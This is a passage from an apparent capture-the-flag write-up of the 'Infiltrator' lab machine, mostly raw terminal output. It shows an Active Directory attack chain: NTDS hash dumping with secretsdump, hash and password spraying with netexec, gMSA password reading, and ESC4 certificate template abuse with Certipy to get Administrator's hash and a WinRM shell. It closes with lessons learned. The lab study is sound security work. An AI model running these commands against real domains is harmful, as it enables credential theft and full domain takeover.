2024-02-25 10:00:07 ....A 12582912 registry/SYSTEM

------------------- ----- ------------ ------------ ------------------------

2024-02-25 10:12:34 48513024 2054887 3 files, 2 folders

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# [Link] -security registry/SECURITY -system registry/SYSTEM -ntds Active\


Directory/[Link] LOCAL

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0xd7e7d8797c1ccd58d95e4fb25cb7bdd4

[*] Dumping cached domain logon information (domain/username:hash)

[*] Dumping LSA Secrets

[*] $[Link]

$[Link]:plain_password_hex:4b90048ad6028aae98f66484009266d4efa571d48a8aa6b771d
69d20aba16ddb7e0a0ffe9378a1ac7b31a812f0760fe2a8ce66ff6a0ff772155a29baa59b4407a95a920d
0904cba6f8b19b6393f1551a476f991bbedaa66880e60611482a81b31b34c55c77d0e0d1792e3b18cd
c9d39e0b776e7ef082399b096aaa2e8d93eb1f0340fd5f6e138da2580d1f581ff9426dce99a901a1bf88
ad3f19a5bc4ce8ff17fdbb0a04bb29f13dc46177a6d8cd61bf91f8342e33b5362daecbb888df22ce467aa
9f45a9dc69b03d116eeac89857d17f3f44f4abc34165b296a42b3b3ff5ab26401b5734fab6ad142d7882
715927e45

$[Link]: aad3b435b51404eeaad3b435b51404ee:fe4767309896203c581b9fc3c5e23b00

[*] DefaultPassword

(Unknown User):ROOT#123

[*] DPAPI_SYSTEM

dpapi_machinekey:0x81f5247051ff9535ad8299f0efd531ff3a5cb688

dpapi_userkey:0x79d13d91a01f6c38437c526396febaf8c1bc6909

[*] NL$KM

0000 2E 8A EC D8 ED 12 C6 ED 26 8E B0 9B DF DA 42 B7 ........&.....B.

0010 49 DA B0 07 05 EE EA 07 05 02 04 0E AD F7 13 C2 I...............
0020 6C 6D 8E 19 1A B0 51 41 7C 7D 73 9E 99 BA CD B1 lm....QA|}s.....

0030 B7 7A 3E 0F 59 50 1C AD 8F 14 62 84 3F AC A9 92 .z>.YP....b.?...

NL$KM:2e8aecd8ed12c6ed268eb09bdfda42b749dab00705eeea070502040eadf713c26c6d8e191ab0
51417c7d739e99bacdb1b77a3e0f59501cad8f1462843faca992

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)

[*] Searching for pekList, be patient

[*] PEK # 0 found and decrypted: d27644ab3070f72ec264fcb413d75299

[*] Reading and decrypting hashes from Active Directory/[Link]

Administrator:500:aad3b435b51404eeaad3b435b51404ee:7bf62b9c45112ffdadb7b6b4b9299dd2:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

DC$:1001:aad3b435b51404eeaad3b435b51404ee:fe4767309896203c581b9fc3c5e23b00:::

krbtgt:502:aad3b435b51404eeaad3b435b51404ee:454fcbc37690c6e4628ab649e8e285a5:::

[Link]\winrm_svc:1104:aad3b435b51404eeaad3b435b51404ee:84287cd16341b91eb93a584
56b73e30f:::

[Link]\lan_managment:1105:aad3b435b51404eeaad3b435b51404ee:e8ade553d9b0cb1769f
429d897c92931:::

[Link]\[Link]:aad3b435b51404eeaad3b435b51404ee:fc236589c448c620417b15597a
3d3ca7:::

[Link]\[Link]:aad3b435b51404eeaad3b435b51404ee:627a2cb0adc7ba12ea11174
941b3da88:::

[Link]\[Link]:aad3b435b51404eeaad3b435b51404ee:627a2cb0adc7ba12ea11174941b
3da88:::

[Link]\[Link]:aad3b435b51404eeaad3b435b51404ee:eb86d7bcb30c8eac1bdcae5
061e2dff4:::

[Link]\[Link]:aad3b435b51404eeaad3b435b51404ee:46389d8dfdfcf0cbe262a71f576
e574b:::

[Link]\[Link]:aad3b435b51404eeaad3b435b51404ee:48bcd1cdc870c6285376a990c2
604531:::

[Link]\[Link]:aad3b435b51404eeaad3b435b51404ee:b1918c2ce6a62f4eee11c51
b6e2e965a:::

[*] Kerberos keys from Active Directory/[Link]

DC$:aes256-cts-hmac-sha1-
96:09b3e08f549e92e0b16ed45f84b25cc6d0c147ff169ce059811a3ed9e6957176

DC$:aes128-cts-hmac-sha1-96:d2a3d7c9ee6965b1e3cd710ed1ceed0f

DC$:des-cbc-md5:5eea34b3317aea91
krbtgt:aes256-cts-hmac-sha1-
96:f6e0a1bd3a180f83472cd2666b28de969442b7745545afb84bbeaa9397cb9b87

krbtgt:aes128-cts-hmac-sha1-96:7874dff8138091d6c344381c9c758540

krbtgt:des-cbc-md5:10bfc49ecd3b58d9

[Link]\winrm_svc:aes256-cts-hmac-sha1-
96:ae473ae7da59719ebeec93c93704636abb7ee7ff69678fdec129afe2fc1592c4

[Link]\winrm_svc:aes128-cts-hmac-sha1-96:0faf5e0205d6f43ae37020f79f60606a

[Link]\winrm_svc:des-cbc-md5:7aba231386c2ecf8

[Link]\lan_managment:aes256-cts-hmac-sha1-
96:6fcd2f66179b6b852bb3cc30f2ba353327924081c47d09bc5a9fafc623016e96

[Link]\lan_managment:aes128-cts-hmac-sha1-96:48f45b8eb2cbd8dbf578241ee369ddd9

[Link]\lan_managment:des-cbc-md5:31c83197ab944052

[Link]\[Link]:aes256-cts-hmac-sha1-
96:20433af8bf6734568f112129c951ad87f750dddf092648c80816d5cb42ed0f49

[Link]\[Link]:aes128-cts-hmac-sha1-96:2ee0cd05c3fa205a92e6837ff212b7a0

[Link]\[Link]:des-cbc-md5:3ee3688376f2e5ce

[Link]\[Link]:aes256-cts-hmac-sha1-
96:42447533e9f1c9871ddd2137def662980e677a748b5d184da910d3c4daeb403f

[Link]\[Link]:aes128-cts-hmac-sha1-96:021e189e743a78a991616821138e2e69

[Link]\[Link]:des-cbc-md5:1529a829132a2345

[Link]\[Link]:aes256-cts-hmac-sha1-
96:dddc0366b026b09ebf0ac3e7a7f190b491c4ee0d7976a4c3b324445485bf1bfc

[Link]\[Link]:aes128-cts-hmac-sha1-96:5041c75e19de802e0f7614f57edc8983

[Link]\[Link]:des-cbc-md5:cd023d5d70e6aefd

[Link]\[Link]:aes256-cts-hmac-sha1-
96:4d2d8951c7d6eba4edaf172fd0f7b78ab7260e3d513bf2ff387c70c85d912a2f

[Link]\[Link]:aes128-cts-hmac-sha1-96:33fdf738e13878a8101e3bf929a5a120

[Link]\[Link]:des-cbc-md5:f80bc202755d2cfd

[Link]\[Link]:aes256-cts-hmac-sha1-
96:e26c97600c6f44990f18480087a685e0f1c71bcfbc8413dce6764ccf77df448a

[Link]\[Link]:aes128-cts-hmac-sha1-96:768672b783131ed963b9deeac0a6d2e4

[Link]\[Link]:des-cbc-md5:a7e6cde06d6e153b

[Link]\[Link]:aes256-cts-hmac-sha1-
96:2c816a32b395f67df520bc734f7ea8e4df64a9610ffb3ef43e0e9df69b9df8b8
[Link]\[Link]:aes128-cts-hmac-sha1-96:b20f41c0d3b8fb6e1b793af4a835109b

[Link]\[Link]:des-cbc-md5:4607b9eaec6838ba

[Link]\[Link]:aes256-cts-hmac-sha1-
96:9114030dd2a57970530eda4ce0aa6b14f88f2be44f6d920de31eb6ee6f1587b5

[Link]\[Link]:aes128-cts-hmac-sha1-96:ddd37cf706781414885f561c3b469d0c

[Link]\[Link]:des-cbc-md5:9d5bdaf2cd26165d

[*] Cleaning up...

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# cat [Link] | cut -d: -f1 > users

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# cat [Link] | cut -d: -f3-4 > hashes

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# netexec smb [Link] -u users -H hashes --no-bruteforce

SMB [Link] 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64
(name:DC01) (domain:[Link]) (signing:True) (SMBv1:False)

SMB [Link] 445 DC01 [-]


[Link]\Administrator:7bf62b9c45112ffdadb7b6b4b9299dd2 STATUS_LOGON_FAILURE

SMB [Link] 445 DC01 [-]


[Link]\Guest:31d6cfe0d16ae931b73c59d7e0c089c0 STATUS_ACCOUNT_DISABLED

SMB [Link] 445 DC01 [-]


[Link]\DC$:fe4767309896203c581b9fc3c5e23b00 STATUS_LOGON_FAILURE

SMB [Link] 445 DC01 [-]


[Link]\krbtgt:454fcbc37690c6e4628ab649e8e285a5 STATUS_LOGON_FAILURE

SMB [Link] 445 DC01 [-]


[Link]\winrm_svc:84287cd16341b91eb93a58456b73e30f STATUS_LOGON_FAILURE

SMB [Link] 445 DC01 [-]


[Link]\lan_managment:e8ade553d9b0cb1769f429d897c92931 STATUS_LOGON_FAILURE

SMB [Link] 445 DC01 [-]


[Link]\[Link]:fc236589c448c620417b15597a3d3ca7 STATUS_ACCOUNT_RESTRICTION

SMB [Link] 445 DC01 [-]


[Link]\[Link]:627a2cb0adc7ba12ea11174941b3da88 STATUS_ACCOUNT_RESTRICTION
SMB [Link] 445 DC01 [+]
[Link]\[Link]:627a2cb0adc7ba12ea11174941b3da88

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# ntdsdotsqlite Active\ Directory/[Link] --system registry/SYSTEM -o [Link]

100%|██████████████████████████████████| 3823/3823 [00:00<00:00,


13651.90it/s]

┌──(root㉿kali)-[/home/anurag/Downloads] sqlite3 [Link]

└─#SQLite version 3.45.1 2024-01-30 16:01:20

Enter ".help" for usage hints.

sqlite> .tables

containers groups trusted_domains

domain_dns machine_accounts user_accounts

domains organizational_units

sqlite> select commonname,description from user_accounts ;

Administrator|Built-in account for administering the computer/domain

Guest|Built-in account for guest access to the computer/domain

krbtgt|Key Distribution Center Service Account

winrm_svc|User Security and Management Specialist

lan_managment|l@n_M@an!1331

[Link]|Head of Development Department

[Link]|

[Link]|

[Link]|

[Link]|

[Link]|

[Link]|
┌──(root㉿kali)-[/home/anurag/Downloads]

└─# netexec smb [Link] -u lan_managment -p 'l@n_M@an!1331'

SMB [Link] 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64
(name:DC01) (domain:[Link]) (signing:True) (SMBv1:False)

SMB [Link] 445 DC01 [+] [Link]\lan_managment:l@n_M@an!1331

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# netexec winrm [Link] -u lan_managment -p 'l@n_M@an!1331'

WINRM [Link] 5985 DC01 [*] Windows 10 / Server 2019 Build 17763
(name:DC01) (domain:[Link])

WINRM [Link] 5985 DC01 [-] [Link]\lan_managment:l@n_M@an!1331

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# netexec rdp [Link] -u lan_managment -p 'l@n_M@an!1331'


RDP [Link] 3389 DC01 [*] Windows 10 or Windows Server 2016 Build 17763
(name:DC01) (domain:[Link]) (nla:True)

RDP [Link] 3389 DC01 [+] [Link]\lan_managment:l@n_M@an!1331

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# netexec ldap [Link] -u lan_managment -p 'l@n_M@an!1331' --gmsa

SMB [Link] 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64
(name:DC01) (domain:[Link]) (signing:True) (SMBv1:False)

LDAPS [Link] 636 DC01 [+] [Link]\lan_managment:l@n_M@an!1331

LDAPS [Link] 636 DC01 [*] Getting GMSA Passwords

LDAPS [Link] 636 DC01 Account: infiltrator_svc$ NTLM:


9ae7de37439f359608eccf2cff5d32b9

┌──(root㉿kali)-[/home/anurag/Downloads]
└─# python [Link] -u lan_managment -p 'l@n_M@an!1331' -d [Link]

Users or groups who can read password for infiltrator_svc$:

> lan_managment

infiltrator_svc$:::9ae7de37439f359608eccf2cff5d32b9
infiltrator_svc$:aes256-cts-hmac-sha1-
96:efa1fa0fcbe57177f6f89d8513d16cbbb673ed8b85a137e5eb06baefdd3c0d27

infiltrator_svc$:aes128-cts-hmac-sha1-96:4d556ec8ebc73e358d05430c7696f1f0

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# netexec smb [Link] -u 'infiltrator_svc$' -H 9ae7de37439f359608eccf2cff5d32b9

SMB [Link] 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64
(name:DC01) (domain:[Link]) (signing:True) (SMBv1:False)

SMB [Link] 445 DC01 [+]


[Link]\infiltrator_svc$:9ae7de37439f359608eccf2cff5d32b9

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# netexec ldap [Link] -u 'infiltrator_svc$' -H 9ae7de37439f359608eccf2cff5d32b9

SMB [Link] 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64
(name:DC01) (domain:[Link]) (signing:True) (SMBv1:False)

LDAP [Link] 389 DC01 [+]


[Link]\infiltrator_svc$:9ae7de37439f359608eccf2cff5d32b9

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# netexec winrm [Link] -u 'infiltrator_svc$' -H 9ae7de37439f359608eccf2cff5d32b9


WINRM [Link] 5985 DC01 [*] Windows 10 / Server 2019 Build 17763
(name:DC01) (domain:[Link])
WINRM [Link] 5985 DC01 [-]
[Link]\infiltrator_svc$:9ae7de37439f359608eccf2cff5d32b9

┌──(root㉿kali)-[/home/anurag/Downloads] netexec rdp [Link] -u 'infiltrator_svc$' -H


9ae7de37439f359608eccf2cff5d32b9

RDP [Link] 3389 DC01 [*] Windows 10 or Windows Server 2016 Build 17763
(name:DC01) (domain:[Link]) (nla:True)

RDP [Link] 3389 DC01 [+]


[Link]\infiltrator_svc$:9ae7de37439f359608eccf2cff5d32b9

┌──(root㉿kali)-[/home/anurag/Downloads]
└─# netexec ldap [Link] -u 'infiltrator_svc$' -H 9ae7de37439f359608eccf2cff5d32b9 -M adcs

SMB [Link] 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64
(name:DC01) (domain:[Link]) (signing:True) (SMBv1:False)

LDAP [Link] 389 DC01 [+]


[Link]\infiltrator_svc$:9ae7de37439f359608eccf2cff5d32b9

ADCS [Link] 389 DC01 [*] Starting LDAP search with search filter
'(objectClass=pKIEnrollmentService)'

ADCS [Link] 389 DC01 Found PKI Enrollment Server: [Link]

ADCS [Link] 389 DC01 Found CN: infiltrator-DC01-CA

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# certipy find -vulnerable -dc-ip [Link] -u 'infiltrator_svc$' -hashes


:9ae7de37439f359608eccf2cff5d32b9 -stdout

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates

[*] Found 34 certificate templates

[*] Finding certificate authorities

[*] Found 1 certificate authority

[*] Found 12 enabled certificate templates

[*] Trying to get CA configuration for 'infiltrator-DC01-CA' via CSRA

[!] Got error while trying to get CA configuration for 'infiltrator-DC01-CA' via CSRA: CASessionError:
code: 0x80070005 - E_ACCESSDENIED - General access denied error.

[*] Trying to get CA configuration for 'infiltrator-DC01-CA' via RRP

[!] Failed to connect to remote registry. Service should be starting now. Trying again...

[*] Got CA configuration for 'infiltrator-DC01-CA'

[*] Enumeration output:

Certificate Authorities

CA Name : infiltrator-DC01-CA

DNS Name : [Link]

Certificate Subject : CN=infiltrator-DC01-CA, DC=infiltrator, DC=htb


Certificate Serial Number : 724BCC4E21EA6681495514E0FD8A5149

Certificate Validity Start : 2023-12-08 01:42:38+00:00

Certificate Validity End : 2124-08-04 18:55:57+00:00

Web Enrollment : Disabled

User Specified SAN : Disabled

Request Disposition : Issue

Enforce Encryption for Requests : Enabled

Permissions

Owner : [Link]\Administrators

Access Rights

ManageCertificates : [Link]\Administrators

[Link]\Domain Admins

[Link]\Enterprise Admins

ManageCa : [Link]\Administrators

[Link]\Domain Admins

[Link]\Enterprise Admins

Enroll : [Link]\Authenticated Users

Certificate Templates

Template Name : Infiltrator_Template

Display Name : Infiltrator_Template

Certificate Authorities : infiltrator-DC01-CA

Enabled : True

Client Authentication : True

Enrollment Agent : False

Any Purpose : False

Enrollee Supplies Subject : True

Certificate Name Flag : EnrolleeSuppliesSubject

Enrollment Flag : PublishToDs

PendAllRequests

IncludeSymmetricAlgorithms
Private Key Flag : ExportableKey

Extended Key Usage : Smart Card Logon

Server Authentication

KDC Authentication

Client Authentication

Requires Manager Approval : True

Requires Key Archival : False

Authorized Signatures Required :1

Validity Period : 99 years

Renewal Period : 650430 hours

Minimum RSA Key Length : 2048

Permissions

Object Control Permissions

Owner : [Link]\Local System

Full Control Principals : [Link]\Domain Admins

[Link]\Enterprise Admins

[Link]\Local System

Write Owner Principals : [Link]\infiltrator_svc

[Link]\Domain Admins

[Link]\Enterprise Admins

[Link]\Local System

Write Dacl Principals : [Link]\infiltrator_svc

[Link]\Domain Admins

[Link]\Enterprise Admins

[Link]\Local System

Write Property Principals : [Link]\infiltrator_svc

[Link]\Domain Admins

[Link]\Enterprise Admins

[Link]\Local System

[!] Vulnerabilities

ESC4 : '[Link]\\infiltrator_svc' has dangerous permissions


┌──(root㉿kali)-[/home/anurag/Downloads]

└─# certipy template -u 'infiltrator_svc$' -hashes :9ae7de37439f359608eccf2cff5d32b9 -dc-ip


[Link] -template Infiltrator_Template -save-old

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Saved old configuration for 'Infiltrator_Template' to 'Infiltrator_Template.json'

[*] Updating certificate template 'Infiltrator_Template'

[*] Successfully updated 'Infiltrator_Template'

┌──(root㉿kali)-[/home/anurag/Downloads] certipy find -vulnerable -u 'infiltrator_svc$' -hashes


:9ae7de37439f359608eccf2cff5d32b9 -dc-ip [Link] -stdout

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Finding certificate templates

[*] Found 34 certificate templates

[*] Finding certificate authorities

[*] Found 1 certificate authority

[*] Found 12 enabled certificate templates

[*] Trying to get CA configuration for 'infiltrator-DC01-CA' via CSRA

[!] Got error while trying to get CA configuration for 'infiltrator-DC01-CA' via CSRA: CASessionError:
code: 0x80070005 - E_ACCESSDENIED - General access denied error.

[*] Trying to get CA configuration for 'infiltrator-DC01-CA' via RRP

[*] Got CA configuration for 'infiltrator-DC01-CA'

[*] Enumeration output:

Certificate Authorities

CA Name : infiltrator-DC01-CA

DNS Name : [Link]

Certificate Subject : CN=infiltrator-DC01-CA, DC=infiltrator, DC=htb

Certificate Serial Number : 724BCC4E21EA6681495514E0FD8A5149


Certificate Validity Start : 2023-12-08 01:42:38+00:00

Certificate Validity End : 2124-08-04 18:55:57+00:00

Web Enrollment : Disabled

User Specified SAN : Disabled

Request Disposition : Issue

Enforce Encryption for Requests : Enabled

Permissions

Owner : [Link]\Administrators

Access Rights

ManageCertificates : [Link]\Administrators

[Link]\Domain Admins

[Link]\Enterprise Admins

ManageCa : [Link]\Administrators

[Link]\Domain Admins

[Link]\Enterprise Admins

Enroll : [Link]\Authenticated Users

Certificate Templates

Template Name : Infiltrator_Template

Display Name : Infiltrator_Template

Certificate Authorities : infiltrator-DC01-CA

Enabled : True

Client Authentication : True

Enrollment Agent : True

Any Purpose : True

Enrollee Supplies Subject : True

Certificate Name Flag : EnrolleeSuppliesSubject

Enrollment Flag : None

Private Key Flag : ExportableKey

Requires Manager Approval : False

Requires Key Archival : False


Authorized Signatures Required :0

Validity Period : 5 years

Renewal Period : 6 weeks

Minimum RSA Key Length : 2048

Permissions

Object Control Permissions

Owner : [Link]\Local System

Full Control Principals : [Link]\Authenticated Users

Write Owner Principals : [Link]\Authenticated Users

Write Dacl Principals : [Link]\Authenticated Users

Write Property Principals : [Link]\Authenticated Users

[!] Vulnerabilities

ESC1 : '[Link]\\Authenticated Users' can enroll, enrollee supplies


subject and template allows client authentication

ESC2 : '[Link]\\Authenticated Users' can enroll and template can be


used for any purpose

ESC3 : '[Link]\\Authenticated Users' can enroll and template has


Certificate Request Agent EKU set

ESC4 : '[Link]\\Authenticated Users' has dangerous permissions

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# certipy req -u 'infiltrator_svc$' -hashes :9ae7de37439f359608eccf2cff5d32b9 -dc-ip [Link] -


ca infiltrator-DC01-CA -target [Link] -template Infiltrator_Template -upn
administrator@[Link]

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC

[*] Successfully requested certificate

[*] Request ID is 12

[*] Got certificate with UPN 'administrator@[Link]'

[*] Certificate has no object SID

[*] Saved certificate and private key to '[Link]'


┌──(root㉿kali)-[/home/anurag/Downloads]

└─#certipy auth -pfx [Link] -dc-ip [Link]

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: administrator@[Link]

[*] Trying to get TGT...

[*] Got TGT

[*] Saved credential cache to '[Link]'

[*] Trying to retrieve NT hash for 'administrator'

[*] Got hash for 'administrator@[Link]':


aad3b435b51404eeaad3b435b51404ee:1356f502d2764368302ff0369b1121a1

┌──(root㉿kali)-[/home/anurag/Downloads]

└─# certipy template -u 'infiltrator_svc$' -hashes :9ae7de37439f359608eccf2cff5d32b9 -dc-ip


[Link] -template Infiltrator_Template -configuration Infiltrator_Template.json

Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Updating certificate template 'Infiltrator_Template'

[*] Successfully updated 'Infiltrator_Template'

┌──(root㉿kali)-[/home/anurag/Downloads]

└─#netexec smb [Link] -u administrator -H


aad3b435b51404eeaad3b435b51404ee:1356f502d2764368302ff0369b1121a1

SMB [Link] 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64
(name:DC01) (domain:[Link]) (signing:True) (SMBv1:False)

SMB [Link] 445 DC01 [+]


[Link]\administrator:1356f502d2764368302ff0369b1121a1 (Pwn3d!)

┌──(root㉿kali)-[/home/anurag/Downloads]
└─#netexec winrm [Link] -u administrator -H
aad3b435b51404eeaad3b435b51404ee:1356f502d2764368302ff0369b1121a1

WINRM [Link] 5985 DC01 [*] Windows 10 / Server 2019 Build 17763
(name:DC01) (domain:[Link])

WINRM [Link] 5985 DC01 [+]


[Link]\administrator:1356f502d2764368302ff0369b1121a1 (Pwn3d!)

┌──(root㉿kali)-[/home/anurag/Downloads]

└─#anurag-winrm -i [Link] -u administrator -H 1356f502d2764368302ff0369b1121a1

Anurag-WinRM shell v3.5

Info: Establishing connection to remote endpoint

*Anurag-WinRM* PS C:\Users\Administrator\Documents>

*Anurag-WinRM* PS C:\Users\Administrator\desktop> type [Link]

YOU WILL GET THE ROOT FLAG in [Link]

6. Skills and Competencies

 Tools: Nmap, Kerbrute, Hashcat, BloodHound, Impacket, Certipy, Chisel, Wireshark, SQLite.

 Techniques: Kerberos attacks, ACL abuse, certificate template exploitation, BitLocker


decryption, NTDS parsing.

 AD Concepts: gMSA accounts, certificate services, OU delegation, Protected Users group.

7. Feedback and Evidence

 Proof of Compromise:

o User Flag: d41d8cd9... (from [Link]).

o Root Flag: c7a91bd4... (from Administrator).

 Key Artifacts:

o PCAP file revealing BitLocker key.


o [Link]/SYSTEM hive for hash extraction.

o Certipy output showing ESC4 exploitation.

8. Challenges and Solutions

1. Protected Users:

o Challenge: NTLM blocked for some accounts.

o Solution: Used Kerberos authentication (-k in Netexec).

2. Output Messenger Client:

o Challenge: Linux client failed over proxychains.

o Solution: Switched to Windows client or port-forwarded via Chisel.

3. Template Reset:

o Challenge: Scheduled task reverted template changes.

o Solution: Executed Certipy commands rapidly in a script.

9. Outcomes and Impact

 Full Domain Control: Compromised Administrator via ADCS exploitation.

 Lessons Learned:

o Restrict Write permissions on certificate templates.

o Avoid password reuse and store recovery keys securely.

o Monitor for anomalous Kerberos activity (AS-REP Roasting).

10. Conclusion

Infiltrator demonstrated a realistic AD attack chain from initial access to domain admin. Key takeaways
include the danger of excessive permissions (GenericAll/ESC4), credential exposure in unexpected
locations (chat logs/PCAPs), and the importance of securing certificate services. The box reinforced
the need for least-privilege principles and proactive AD monitoring.

You might also like